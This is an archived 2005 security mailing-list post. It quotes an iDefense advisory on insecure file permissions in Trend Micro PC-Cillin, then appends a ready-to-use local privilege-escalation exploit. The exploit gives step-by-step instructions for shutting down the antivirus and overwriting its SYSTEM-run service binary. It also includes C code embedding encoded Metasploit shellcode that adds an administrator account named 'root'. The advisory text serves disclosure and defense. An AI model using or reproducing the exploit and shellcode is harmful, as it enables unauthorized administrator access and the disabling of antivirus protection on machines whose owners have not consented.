[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <43B11FC3.4090205@fh-hagenberg.at>
Date: Tue Dec 27 16:51:55 2005
From: gerhard.wagner at fh-hagenberg.at (Gerhard Wagner)
Subject: iDefense Security Advisory 12.14.05: Trend
Micro PC-Cillin Internet Security Insecure File Permission
Vulnerability
labs-no-reply@...fense.com wrote:
>
> Trend Micro PC-Cillin Internet Security Insecure File Permission
> Vulnerability
>
> iDefense Security Advisory 12.14.05
> www.idefense.com/application/poi/display?id=351&type=vulnerabilities
> December 14, 2005
>
> I. BACKGROUND
>
> Trend Micro PC-Cillin Internet Security is antivirus protection software
> for home and business use. It provides complete protection, detection
> and elimination of thousands of computer viruses, worms, and Trojan
> Horse programs.
>
> II. DESCRIPTION
>
> Local exploitation of an insecure permission vulnerability in multiple
> Trend Micro Inc. products allows attackers to escalate privileges or
> disable protection.
>
> The vulnerabilities specifically exist in the default Access Control
> List (ACL) settings that are applied during installation. When an
> administrator installs an affected Trend Micro product, the default ACL
> allows any user to modify the installed files. Due to the fact that some
> of the programs run as system services, a user could replace an
> installed Trend Micro product file with their own malicious code, and
> the code would be executed with system privileges.
>
> III. ANALYSIS
>
> Successful exploitation allows local attackers to escalate privileges to
> the system level. It is also possible to use this vulnerability to
> simply disable protection by moving all of the executable files so that
> they cannot start upon a reboot. Once disabled, the products are no
> longer able to provide threat mitigation, thus opening the machine up to
> attack.
>
> IV. DETECTION
>
> iDefense has confirmed the existence of this vulnerability in Trend
> Micro PC-Cillin Internet Security 2005 version 12.00 build 1244. It is
> suspected that previous versions are also vulnerable. It has been
> reported that InterScan VirusWall, InterScan eManager and Office Scan
> are also vulnerable.
>
> V. WORKAROUND
>
> Apply proper Access Control List settings to the directory that the
> affected Trend Micro product is installed in. The ACL rules be set so
> that no regular users can modify files in the directory.
>
> VI. VENDOR RESPONSE
>
> "Trend Micro has become aware of a vulnerability related to PC-CILLIN
> 12. PC-cillin12 does not work correctly when configuration file and the
> registry are erased intentionally.
>
> We will release PC-cillin12.4 in December 14, 2005 by AU server. This
> release will be included short term solution of changing ACL to User
> authority for configuration file and registry.
>
> And
>
> We will create a tool for changing ACL to User authority for
> configuration file and registry.
>
> This tool can be used for both PC-cillin12 and PC-cillin14 as a same
> program."
>
> VII. CVE INFORMATION
>
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2005-3360 to this issue. This is a candidate for inclusion in
> the CVE list (http://cve.mitre.org), which standardizes names for
> security problems.
>
> VIII. DISCLOSURE TIMELINE
>
> 10/27/2005 Initial vendor notification
> 10/27/2005 Initial vendor response
> 12/14/2005 Public disclosure
>
> IX. CREDIT
>
> The discoverer of this vulnerability wishes to remain anonymous.
>
> Get paid for vulnerability research
> http://www.iDefense.com/poi/teams/vcp.jsp
>
> X. LEGAL NOTICES
>
> Copyright ? 2005 iDefense, Inc.
>
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without the express
> written consent of iDefense. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically, please
> email customerservice@...fense.com for permission.
>
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
/*
* by Team W00dp3ck3r:
* frauk\x41iser, mag00n and s00n
*
* Advisory: www.idefense.com/application/poi/display?id=351&type=vulnerabilities
* Tested on Windows XP Service Pack 2 english
* Version affected PC-cillin Internet Security 2006
*
* Status: currently no patch has been provided (19.12.2005)
*
* Follow the instructions to gain administrative privileges:
*
*
* 1.) Default Installation (can only be accomplished as Administrator).
* 2.) Login is as restricted user.
* 3.) Compile the c code provided at the bottom of this document.
* 4.) Right click on the Trend Micro icon in the taskbar and shut down Trend Micro
* (Seems that Trend has forgotten that normal users should not be able to
* shutdown an antivirus service).
* 5.) Fire up your favorite editor and open the previous compiled exe (we recommend
* UltraEdit) and also open TmPfw.exe which is located in the default installation
* directory of your Trend Micro installation.
* 6.) First copy the content of the TmPfw.exe into a blank document and save it.
* We will need it later, when we want to repair the service.
* 7.) Now replace the content of the TmPfw.exe file with the content of the self
* compiled executable.
*
* Note: It is really important to alter the content of the TmPfw.exe file. If you
* just change the filename of the created executable and then replace the
* file, the initial rights which are set during the installation would be lost.
* The TmPfw.exe file is executed with SYSTEM rights during startup process of
* Windows and it's under our control, because Trend Micro really messed up with
* the permissions.
*
* 8.) Restart the pccmain.exe and if you type net user in your command shell you will
* notice a user with administrative rights called root.
* 9.) Finally open the editor again and restore the content of the TmPfw.exe. Now
* Trend Micro works again without complaining.
*
*/
#include "windows.h"
/* win32_adduser - PASS=root EXITFUNC=thread USER=root Size=232
* Encoder=PexFnstenvSub http://metasploit.com */
unsigned char shellcode[] =
"\x29\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x72"
"\x66\xf2\xa7\x83\xeb\xfc\xe2\xf4\x8e\x8e\xb6\xa7\x72\x66\x79\xe2"
"\x4e\xed\x8e\xa2\x0a\x67\x1d\x2c\x3d\x7e\x79\xf8\x52\x67\x19\xee"
"\xf9\x52\x79\xa6\x9c\x57\x32\x3e\xde\xe2\x32\xd3\x75\xa7\x38\xaa"
"\x73\xa4\x19\x53\x49\x32\xd6\xa3\x07\x83\x79\xf8\x56\x67\x19\xc1"
"\xf9\x6a\xb9\x2c\x2d\x7a\xf3\x4c\xf9\x7a\x79\xa6\x99\xef\xae\x83"
"\x76\xa5\xc3\x67\x16\xed\xb2\x97\xf7\xa6\x8a\xab\xf9\x26\xfe\x2c"
"\x02\x7a\x5f\x2c\x1a\x6e\x19\xae\xf9\xe6\x42\xa7\x72\x66\x79\xcf"
"\x4e\x39\xc3\x51\x12\x30\x7b\x5f\xf1\xa6\x89\xf7\x1a\x89\x3c\x47"
"\x12\x0e\x6a\x59\xf8\x68\xa5\x58\x95\x05\x9f\xc3\x5c\x03\x8a\xc2"
"\x52\x49\x91\x87\x1c\x03\x86\x87\x07\x15\x97\xd5\x52\x14\x9d\xc8"
"\x06\x46\x80\xc8\x1d\x12\xd2\x88\x33\x22\xb6\x87\x54\x40\xd2\xc9"
"\x17\x12\xd2\xcb\x1d\x05\x93\xcb\x15\x14\x9d\xd2\x02\x46\xb3\xc3"
"\x1f\x0f\x9c\xce\x01\x12\x80\xc6\x06\x09\x80\xd4\x52\x14\x9d\xc8"
"\x06\x46\xdd\xe6\x36\x22\xf2\xa7";
void (*opcode)();
void main(){
opcode= &shellcode;
opcode();
}
Powered by blists - more mailing lists